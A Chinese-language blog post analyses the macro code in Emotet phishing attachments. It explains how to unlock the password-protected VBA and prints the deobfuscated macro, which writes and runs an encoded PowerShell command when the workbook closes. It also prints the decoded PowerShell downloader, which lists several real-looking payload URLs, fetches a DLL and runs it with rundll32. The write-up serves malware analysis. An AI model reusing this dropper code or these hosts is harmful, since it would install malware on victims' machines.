12-06 07:31 阅读 274

关注

Emotet木马病毒宏代码分析

最近收到一些仿冒同事发送的邮件，会带附件doc 或 xls
其中 vba 是有加密的，这个破解不难，notepad++ 打开文档，查找字符串 DPM= 改为 DPx=，保存。再打开时忽略错误提示加载，然后点文件有个转换格式的，再保存，宏代码就能看到了。

实际有用的代码是一堆
#If VBA7 Then
Declare PtrSafe Function DdeFreeStringHandle Lib "user32" (ByVal idInst As LongPtr, ByVal hsz As LongPtr) As LongPtr
Declare PtrSafe Function DefDlgProc Lib "user32" Alias "DefDlgProcA" (ByVal hDlg As LongPtr, ByVal wMsg As LongPtr, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function DeferWindowPos Lib "user32" (ByVal hWinPosInfo As LongPtr, ByVal hWnd As LongPtr, ByVal hWndInsertAfter As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal cx As LongPtr, ByVal cy As LongPtr, ByVal wFlags As LongPtr) As LongPtr
...还有很多

还有就是实际执行下载和执行病毒的方法
Private Sub Workbook_BeforeClose(Cancel As Boolean)
hfoi4atsoighhoin7geofi9sidhu
End Sub

Sub hfoi4atsoighhoin7geofi9sidhu()
Dim fhisdu As String
tyuo4iwhdofigh.Tag = Cells(76, 1) ‘文件名的位置
tyuo4iwhdofigh.TextBox1.Text = "cwgjamd /wgjac swgjatarwgjat/wgjaB "
tyuo4iwhdofigh.ComboBox1.Tag = Cells(75, 1) + vbCrLf + Cells(77, 1) '这2个加起来就是 powershell -enc 加密的base64脚本
tyuo4iwhdofigh.TextBox1.Text = Replace(tyuo4iwhdofigh.TextBox1.Text, "wgja", "") '字符串替换后就是 cmd /c start /B
Open tyuo4iwhdofigh.Tag For Output As #1
Print #1, tyuo4iwhdofigh.ComboBox1.Tag
tyuo4iwhdofigh.TextBox1.Text = ""
Close #1
SeFufisdHiehfosdo tyuo4iwhdofigh.TextBox1.Text & tyuo4iwhdofigh.Tag, 0 'WinExec 正式执行
End Sub
除了这些，还有一堆浪费时间的代码

powershell解密base64大概长这样
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodeText))

powershell的加密base64，解密后
$strs="http://boardingschoolsoftware.com/Vineet_Backup/Z9o3/,
https://terracondivisa.farsiprossimofaenza.org/wp-content/aiosDOa1DS/,
http://coachdto.com/ddek/glfD3CfGrW5QGcThUA/,
http://phatthalung.drr.go.th/content/km2em799xx7PfikSm/,
http://thinglabs.xyz/overcollar/s4rNtArh/,
http://knossosclothing.club/amla/bk/".Split(",")
foreach($st in $strs){
$r1=Get-Random
$r2=Get-Random
$tpth="C:\ProgramData\"+$r1+".dll"
Invoke-WebRequest -Uri $st -OutFile $tpth
if(Test-Path $tpth){
if((Get-Item $tpth).Length -ge 50000){
$fp="C:\Windows\SysWow64\rundll32.exe"
$a=$tpth+",f"+$r2
Start-Process $fp -ArgumentList $a
break
}}}

就是下载个dll，如果成功下载，文件正常，就rundll32.exe 开工了，具体做什么坏事，这个就。。。